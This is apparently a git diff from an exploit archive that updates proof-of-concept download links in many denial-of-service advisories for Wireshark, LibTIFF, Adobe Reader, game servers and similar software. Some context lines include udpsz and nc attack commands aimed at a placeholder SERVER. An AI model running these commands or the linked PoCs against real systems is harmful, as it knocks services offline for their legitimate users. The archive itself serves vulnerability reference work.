-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42125.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42125.zip \ No newline at end of file diff --git a/exploits/multiple/dos/10205.txt b/exploits/multiple/dos/10205.txt index bb231e18f..cd66a39c8 100644 --- a/exploits/multiple/dos/10205.txt +++ b/exploits/multiple/dos/10205.txt @@ -168,4 +168,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10205.zip (2009-11-22-35451.zip) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10205.zip (2009-11-22-35451.zip) \ No newline at end of file diff --git a/exploits/multiple/dos/10327.txt b/exploits/multiple/dos/10327.txt index d63c6fa9c..0c272f477 100644 --- a/exploits/multiple/dos/10327.txt +++ b/exploits/multiple/dos/10327.txt @@ -146,4 +146,4 @@ Avaya Intuity AUDIX LX 2.0 Avaya Intuity AUDIX LX 1.0 Avaya Intuity AUDIX -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10327.pdf (2009-12-05-34337.pdf) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/10327.pdf (2009-12-05-34337.pdf) \ No newline at end of file diff --git a/exploits/multiple/dos/11142.txt b/exploits/multiple/dos/11142.txt index a3e2421cf..b9ce8ab8b 100644 --- a/exploits/multiple/dos/11142.txt +++ b/exploits/multiple/dos/11142.txt @@ -45,4 +45,4 @@ Not Vulnerable: Firefox 3.5.3 on Windows crashed once but not reliably. PoC Packagetx: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11142.zip (Dr_IDE_ScaryMovie_Study.zip) \ No newline at end of file diff --git a/exploits/multiple/dos/14268.txt b/exploits/multiple/dos/14268.txt index baef73c42..8db7eedfd 100644 --- a/exploits/multiple/dos/14268.txt +++ b/exploits/multiple/dos/14268.txt @@ -69,7 +69,7 @@ Multi-Computer Virtual Whiteboard and so on. http://aluigi.org/poc/qtsslame.zip or -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14268.zip (qtsslame.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14268.zip (qtsslame.zip) ####################################################################### diff --git a/exploits/multiple/dos/14761.txt b/exploits/multiple/dos/14761.txt index f1ad751fc..3c8b9f25b 100644 --- a/exploits/multiple/dos/14761.txt +++ b/exploits/multiple/dos/14761.txt @@ -9,7 +9,7 @@ Website : http://www.itsecteam.com Forum : http://forum.ITSecTeam.com --------------------------------------------------------------------------- Advisory URL: http://itsecteam.com/en/papers/paper11.htm -POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/14761.zip (adb_poc.zip) +POC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14761.zip (adb_poc.zip) --------------------------------------------------------------------------- System Affected: Adobe Acrobat reader 7.x diff --git a/exploits/multiple/dos/15086.py b/exploits/multiple/dos/15086.py index 4518c0545..7a3bf8213 100755 --- a/exploits/multiple/dos/15086.py +++ b/exploits/multiple/dos/15086.py @@ -7,7 +7,7 @@ |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moaub-23-adobe-acrobat-and-reader-newfunction-remote-code-execution-vulnerability/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15086.zip (moaub-23-exploit.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15086.zip (moaub-23-exploit.zip) ''' ''' diff --git a/exploits/multiple/dos/15215.txt b/exploits/multiple/dos/15215.txt index fe0efbfef..079474e88 100644 --- a/exploits/multiple/dos/15215.txt +++ b/exploits/multiple/dos/15215.txt @@ -284,7 +284,7 @@ With similar PoC we can try attack ftp.adobe.com, ftp.openbsd.org etc. 0day remote ftpd Denial-of-Service: http://cxib.net/stuff/glob-0day.c -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15215.c (glob-0day.c) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15215.c (glob-0day.c) - --- 3. Fix --- Oracle 25.09.2010 CET: Being fixed in main codeline diff --git a/exploits/multiple/dos/15261.txt b/exploits/multiple/dos/15261.txt index d48f1d4cf..d803049e7 100644 --- a/exploits/multiple/dos/15261.txt +++ b/exploits/multiple/dos/15261.txt @@ -64,7 +64,7 @@ The effects of the problem can be: http://aluigi.org/poc/soliddb_1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15261.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15261.zip ####################################################################### diff --git a/exploits/multiple/dos/15676.txt b/exploits/multiple/dos/15676.txt index 3d39b5615..670db6199 100644 --- a/exploits/multiple/dos/15676.txt +++ b/exploits/multiple/dos/15676.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow attackers to crash the application and deny serv This issue affects Wireshark 1.2.0 through 1.2.12 and 1.4.0 through 1.4.1. -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15676-pcap.zip \ No newline at end of file +PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15676-pcap.zip \ No newline at end of file diff --git a/exploits/multiple/dos/15707.txt b/exploits/multiple/dos/15707.txt index 7f0d67bfa..7cf9e4fb7 100644 --- a/exploits/multiple/dos/15707.txt +++ b/exploits/multiple/dos/15707.txt @@ -93,7 +93,7 @@ memory location: http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15707.zip (udpsz.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15707.zip (udpsz.zip) udpsz -C "00004b14 00000000 00000001 00000000 0001 0000" -b 0x61 -T SERVER 9001 0x4b18 diff --git a/exploits/multiple/dos/15973.txt b/exploits/multiple/dos/15973.txt index 97fabaf66..4d932c949 100644 --- a/exploits/multiple/dos/15973.txt +++ b/exploits/multiple/dos/15973.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the application to enter an infinite l Wireshark 1.4.0 to 1.4.1 are vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15973.pcap (44986.pcap) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/15973.pcap (44986.pcap) \ No newline at end of file diff --git a/exploits/multiple/dos/16261.txt b/exploits/multiple/dos/16261.txt index 36982f7bb..0666fe771 100644 --- a/exploits/multiple/dos/16261.txt +++ b/exploits/multiple/dos/16261.txt @@ -147,4 +147,4 @@ n/a -- Luca Carettoni -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/16261.zip \ No newline at end of file +PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/16261.zip \ No newline at end of file diff --git a/exploits/multiple/dos/1709.txt b/exploits/multiple/dos/1709.txt index 10174073b..ac5713633 100644 --- a/exploits/multiple/dos/1709.txt +++ b/exploits/multiple/dos/1709.txt @@ -18,4 +18,4 @@ Author: Luigi Auriemma ####################################################################### -Backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1709.zip (04232006-openttdx.zip) \ No newline at end of file +Backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1709.zip (04232006-openttdx.zip) \ No newline at end of file diff --git a/exploits/multiple/dos/17201.php b/exploits/multiple/dos/17201.php index 233177c3b..d1f6349d4 100644 --- a/exploits/multiple/dos/17201.php +++ b/exploits/multiple/dos/17201.php @@ -46,4 +46,4 @@ $phar = new Phar(dirname(__FILE__) . '/poc.phar.tar'); ?> -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/17201.phar.tar (poc.phar.tar) \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17201.phar.tar (poc.phar.tar) \ No newline at end of file diff --git a/exploits/multiple/dos/1801.txt b/exploits/multiple/dos/1801.txt index 7d87f5be8..cc5a7f1a3 100644 --- a/exploits/multiple/dos/1801.txt +++ b/exploits/multiple/dos/1801.txt @@ -1,5 +1,5 @@ # libextractor <= 0.5.13 Multiple Heap Overflow PoC Exploits -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1801.zip (05172006-libextho.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1801.zip (05172006-libextho.zip) # milw0rm.com [2006-05-17] \ No newline at end of file diff --git a/exploits/multiple/dos/1820.txt b/exploits/multiple/dos/1820.txt index 73e6d873c..fcf4cbb53 100644 --- a/exploits/multiple/dos/1820.txt +++ b/exploits/multiple/dos/1820.txt @@ -1,5 +1,5 @@ # netPanzer 0.8 rev 952 (frameNum) Server Terminiation Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1820.zip (05232006-panza.zip) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1820.zip (05232006-panza.zip) # milw0rm.com [2006-05-23] \ No newline at end of file diff --git a/exploits/multiple/dos/18600.txt b/exploits/multiple/dos/18600.txt index 981b37a27..ad927ff84 100644 --- a/exploits/multiple/dos/18600.txt +++ b/exploits/multiple/dos/18600.txt @@ -104,7 +104,7 @@ bytes. http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18600.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18600.zip A] udpsz -T -C "00000100 ffff0200" 0 -b a -C "00 00 1000000000000000 00" -1 SERVER 2502 8+0x02ffff diff --git a/exploits/multiple/dos/18601.txt b/exploits/multiple/dos/18601.txt index d7aaabb3d..040e6e409 100644 --- a/exploits/multiple/dos/18601.txt +++ b/exploits/multiple/dos/18601.txt @@ -101,7 +101,7 @@ again. http://aluigi.org/poc/nsrexecd_1.dat -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18601.dat +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18601.dat nc SERVER PORT < nsrexecd_1.dat diff --git a/exploits/multiple/dos/18758.txt b/exploits/multiple/dos/18758.txt index 5fd8df973..5612789d8 100644 --- a/exploits/multiple/dos/18758.txt +++ b/exploits/multiple/dos/18758.txt @@ -9,4 +9,4 @@ The following Wireshark versions are vulnerable: 1.4.0 through 1.4.11 1.6.0 through 1.6.5 -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18758.pcap \ No newline at end of file +PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18758.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/18877.txt b/exploits/multiple/dos/18877.txt index eafa52acb..1db97f76a 100644 --- a/exploits/multiple/dos/18877.txt +++ b/exploits/multiple/dos/18877.txt @@ -94,7 +94,7 @@ INCREMENT SYSAM_LICENSE_SERVER SYBASE 2.0 permanent 1 ISSUER="Sybase, \ http://aluigi.org/testz/udpsz.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18877.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18877.zip udpsz -D -T -C "2f 24 189d 4000 0000 0000 00000000 00000000 0000" -b 0x61 SERVER 27000 0x4000 diff --git a/exploits/multiple/dos/18890.txt b/exploits/multiple/dos/18890.txt index c178a9d7f..d13fc0187 100644 --- a/exploits/multiple/dos/18890.txt +++ b/exploits/multiple/dos/18890.txt @@ -8,8 +8,8 @@ some PoC codes which are now available online: http://www.agarri.fr/docs/batik-evil.svg http://www.agarri.fr/docs/batik-evil.jar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18890.svg -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18890.jar +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18890.svg +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18890.jar I published a more detailed article on my blog: http://www.agarri.fr/blog/ diff --git a/exploits/multiple/dos/18918.txt b/exploits/multiple/dos/18918.txt index 669b77063..d2cc5fbcf 100644 --- a/exploits/multiple/dos/18918.txt +++ b/exploits/multiple/dos/18918.txt @@ -7,4 +7,4 @@ Successful exploits may allow attacker to crash the affected application, denyin Wireshark 1.4.0 to 1.4.12 and 1.6.0 to 1.6.7 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18918.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18918.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/18919.txt b/exploits/multiple/dos/18919.txt index 71e399b36..aa5488b64 100644 --- a/exploits/multiple/dos/18919.txt +++ b/exploits/multiple/dos/18919.txt @@ -7,11 +7,11 @@ An attacker can exploit these issues to crash the affected application, denying Wireshark versions 1.6.0 through 1.6.7 and versions 1.4.0 through 1.4.12 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-1.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-2.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-3.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-4.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-5.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-6.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-7.pcap -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18919-8.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-1.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-2.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-3.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-4.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-5.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-6.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-7.pcap +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18919-8.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/18920.txt b/exploits/multiple/dos/18920.txt index 854d908f2..f37feb82a 100644 --- a/exploits/multiple/dos/18920.txt +++ b/exploits/multiple/dos/18920.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to crash the affected application, denying se Wireshark versions 1.6.0 through 1.6.7 and versions 1.4.0 through 1.4.12 are vulnerable. PoC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18920.pcap \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18920.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/19380.txt b/exploits/multiple/dos/19380.txt index 650ce331f..6911d545d 100644 --- a/exploits/multiple/dos/19380.txt +++ b/exploits/multiple/dos/19380.txt @@ -9,4 +9,4 @@ Where glob1 is 3000 characters. Marc Maiffret has released the following exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19380.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19380.zip \ No newline at end of file diff --git a/exploits/multiple/dos/19482.txt b/exploits/multiple/dos/19482.txt index 801c454b3..ef186324b 100644 --- a/exploits/multiple/dos/19482.txt +++ b/exploits/multiple/dos/19482.txt @@ -17,7 +17,7 @@ http://www.reactionpenetrationtesting.co.uk/FIT-file-handling-DoS.html PoC file is available here: http://www.reactionpenetrationtesting.co.uk/vuln.fit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19482.fit +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19482.fit Affected Products diff --git a/exploits/multiple/dos/19780.txt b/exploits/multiple/dos/19780.txt index 685f7a01e..4af17b9e4 100644 --- a/exploits/multiple/dos/19780.txt +++ b/exploits/multiple/dos/19780.txt @@ -26,9 +26,9 @@ cgiRqCfg.exe provides to the client configuration settings which will disable sc cgiOnStart.exe will need to be put on the attacking webserver as the client expects it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-1.exe +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19780-1.exe -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-2.exe +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19780-2.exe this script will replay the request to the client, and may be launched from any machine. Modify for your installation and desired client response. @@ -46,4 +46,4 @@ sleep 5 Trend Micro Officescan Denial of Service (tmosdos.zip) was contributed by Marc Ruef . This tool is a pre-compiled Windows binary with Visual Basic source. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19780-3.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19780-3.zip \ No newline at end of file diff --git a/exploits/multiple/dos/20052.txt b/exploits/multiple/dos/20052.txt index a7217c855..c3f25ad5b 100644 --- a/exploits/multiple/dos/20052.txt +++ b/exploits/multiple/dos/20052.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1421/info If an E-mail containing an excessively long To: field in the header (~1.5 MB) is processed by First Class Intranet Services (FCIS), a Denial of Service can occur. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20052.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20052.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/20098.txt b/exploits/multiple/dos/20098.txt index 8c699dca5..1b3a79553 100644 --- a/exploits/multiple/dos/20098.txt +++ b/exploits/multiple/dos/20098.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1503/info Netscape Browsers use the Independent JPEG Group's decoder library to process JPEG encoded images. The library functions skip JPEG comments; however, the browser uses a custom function to process these comments and store them in memory. The comment includes a 2-byte "length" field which indicates how long the comment is - this value includes the 2-bytes of the "length" field. To determine the length of the comment string alone (for memory allocation), the function reads the value in the "length" field and subtracts two. The function then allocates the length of the comment + one byte for NULL termination. There is no error checking to ensure the "length" value is valid. This makes it possible to cause an overflow by creating an image with a comment "length" field containing the value 1. The memory allocation call of 0 bytes (1 minus 2 (length field) + 1 (null termination)) will succeed. The calculated comment size variable is declared unsigned, resulting in a large positive value (from 1 minus 2). The comment handling function goes into a loop to read the comment into memory, but since the calculated comment size is enormous this causes the function to read the entire JPEG stream, overwriting the heap. It is theoretically possible to exploit this to execute arbitrary code. The browser, mail and news readers are all vulnerable to this. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20098.jpg \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20098.jpg \ No newline at end of file diff --git a/exploits/multiple/dos/20558.txt b/exploits/multiple/dos/20558.txt index 785cda135..0deb45af1 100644 --- a/exploits/multiple/dos/20558.txt +++ b/exploits/multiple/dos/20558.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2216/info Apache Web Server 1.2 and previous versions are subject to a denial of service. By requesting a malformed GET request composed of an unusually large number of '/' characters, an attacker can cause CPU usage to spike. A restart of the service is required to gain normal functionality. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20558.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20558.zip \ No newline at end of file diff --git a/exploits/multiple/dos/21572.txt b/exploits/multiple/dos/21572.txt index 355860a24..c663abd7c 100644 --- a/exploits/multiple/dos/21572.txt +++ b/exploits/multiple/dos/21572.txt @@ -4,4 +4,4 @@ Half-Life is a popular game distributed and maintained by Valve Software. It inc A denial of service vulnerability has been reported in some versions of the Half-Life server. A remote party may create a large number of new users on a specific server through spoofing the connection conversation. As servers contain a set limit on the maximum number of players, server resources will be exhausted, and legitimate players will not be allowed to join the game. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21572.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21572.zip \ No newline at end of file diff --git a/exploits/multiple/dos/21593.txt b/exploits/multiple/dos/21593.txt index 6a1fa1b5c..3f515830d 100644 --- a/exploits/multiple/dos/21593.txt +++ b/exploits/multiple/dos/21593.txt @@ -4,4 +4,4 @@ Unreal Tournament is a game produced by Epic Games, available for Microsoft Wind It is possible to use an Unreal Tournament server as an amplifyer in a flooding attack, by transmiting multiple UDP packets with a spoofed victim IP address. The server will make repeated attempts to initiate a connection with the specified address, consuming network resources. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21593.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21593.tgz \ No newline at end of file diff --git a/exploits/multiple/dos/23231.txt b/exploits/multiple/dos/23231.txt index d6ecad9b8..fcada934d 100644 --- a/exploits/multiple/dos/23231.txt +++ b/exploits/multiple/dos/23231.txt @@ -6,4 +6,4 @@ Successful exploitation of this issue may allow an attacker to cause the softwar Medieval Total War versions 1.1 and prior are reported to be prone to this vulnerability. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23231.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23231.zip \ No newline at end of file diff --git a/exploits/multiple/dos/23556.txt b/exploits/multiple/dos/23556.txt index 28c5c3d63..31174cd35 100644 --- a/exploits/multiple/dos/23556.txt +++ b/exploits/multiple/dos/23556.txt @@ -4,4 +4,4 @@ The GetWare Web Server component has been reported prone to a remote denial of s A remote attacker may exploit this issue to deny service to the GetWare Web Server. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23556.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23556.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23641.txt b/exploits/multiple/dos/23641.txt index bd4f03e97..e2a131491 100644 --- a/exploits/multiple/dos/23641.txt +++ b/exploits/multiple/dos/23641.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23641.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23641.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23642.txt b/exploits/multiple/dos/23642.txt index 65a114b74..597a87ef7 100644 --- a/exploits/multiple/dos/23642.txt +++ b/exploits/multiple/dos/23642.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9567/info Chaser has been reported to be prone to a denial of service vulnerability. This issue is caused by a lack of input validation of a size parameter specified in UDP network communication packets. The process will attempt to read the amount of data specified by the packet, without regard to the amount of memory allocated. This will cause an attempt by the application to dereference unallocated memory, producing an exception and causing the process to crash. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23642.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23642.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23755.txt b/exploits/multiple/dos/23755.txt index 5376e8c75..48605a627 100644 --- a/exploits/multiple/dos/23755.txt +++ b/exploits/multiple/dos/23755.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9738/info The Ghost Recon Game Engine has been reported prone to a denial of service vulnerability. When handling text strings, the Ghost Recon Game Engine employs a 32-bit integer string size prefix in order to monitor the size of the string. It has been reported that when an invalid size value is supplied an exception will be triggered causing a system wide denial of service. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23755.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23755.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23805.txt b/exploits/multiple/dos/23805.txt index c9f4881f4..98e5577b4 100644 --- a/exploits/multiple/dos/23805.txt +++ b/exploits/multiple/dos/23805.txt @@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/9849/info The Battle Mages game server has been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when the server receives incomplete client data. Specifically the affected server will attempt to read the expected data size infinitely until it is received, this may allow a remote attacker to tie up server resources and effectively deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23805-1.rar +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23805-1.rar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23805-2.rar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23805-2.rar \ No newline at end of file diff --git a/exploits/multiple/dos/23902.txt b/exploits/multiple/dos/23902.txt index 106a954fa..211b3215a 100644 --- a/exploits/multiple/dos/23902.txt +++ b/exploits/multiple/dos/23902.txt @@ -4,4 +4,4 @@ Roger Wilco Server has been reported prone to a remote denial of service vulnera A remote attacker may exploit this condition to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23902.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23902.zip \ No newline at end of file diff --git a/exploits/multiple/dos/23904.txt b/exploits/multiple/dos/23904.txt index 0df8e93d6..6b47590b6 100644 --- a/exploits/multiple/dos/23904.txt +++ b/exploits/multiple/dos/23904.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/10025/info A vulnerability has been reported in the Roger Wilco Server, it is reported that a user does not need to connect to the server over the TCP port to have UDP based audio streams handled. Rather the attacker will require knowledge of user ID's connected to a target channel. Because the user ID's for a channel exist in a range of 0-127, the attacker may transmit an audio stream to an affected server that will be heard by all connected users, however the server administrator will have no control over disconnecting or muting this audio stream. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23904.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23904.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24170.txt b/exploits/multiple/dos/24170.txt index 170aca2e3..053b22f14 100644 --- a/exploits/multiple/dos/24170.txt +++ b/exploits/multiple/dos/24170.txt @@ -6,4 +6,4 @@ When entering the multiplayer menu, the game client sends a broadcast message re An attacker running a malicious server process could block all multiplayer access in a local network, denying service to all legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24170.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24170.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24486.txt b/exploits/multiple/dos/24486.txt index 0407a0702..7edcc5f1e 100644 --- a/exploits/multiple/dos/24486.txt +++ b/exploits/multiple/dos/24486.txt @@ -44,4 +44,4 @@ can be performed on any HTTP Authentication portal. RECOMMENDATIONS Reference how Firefox and Safari handle the attached code. -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24486.tar.gz \ No newline at end of file +PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24486.tar.gz \ No newline at end of file diff --git a/exploits/multiple/dos/24668.txt b/exploits/multiple/dos/24668.txt index 729e9594d..ec86c4027 100644 --- a/exploits/multiple/dos/24668.txt +++ b/exploits/multiple/dos/24668.txt @@ -4,4 +4,4 @@ Flash Messaging server is reported prone to a remote denial of service vulnerabi Flash Messaging server 5.2.0g and prior versions are reported prone to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24668.tar \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24668.tar \ No newline at end of file diff --git a/exploits/multiple/dos/24691.txt b/exploits/multiple/dos/24691.txt index f1fc5af95..0c82dd92a 100644 --- a/exploits/multiple/dos/24691.txt +++ b/exploits/multiple/dos/24691.txt @@ -6,4 +6,4 @@ It is reported that, when handled, a sufficiently malformed audio stream will ca An attacker may exploit this condition to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24691.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24691.zip \ No newline at end of file diff --git a/exploits/multiple/dos/24761.txt b/exploits/multiple/dos/24761.txt index d74e147da..c5770608e 100644 --- a/exploits/multiple/dos/24761.txt +++ b/exploits/multiple/dos/24761.txt @@ -4,4 +4,4 @@ The Halo game client is reported prone to a remote denial of service vulnerabili A remote attacker may exploit this vulnerability to deny service to legitimate users. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24761.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24761.zip 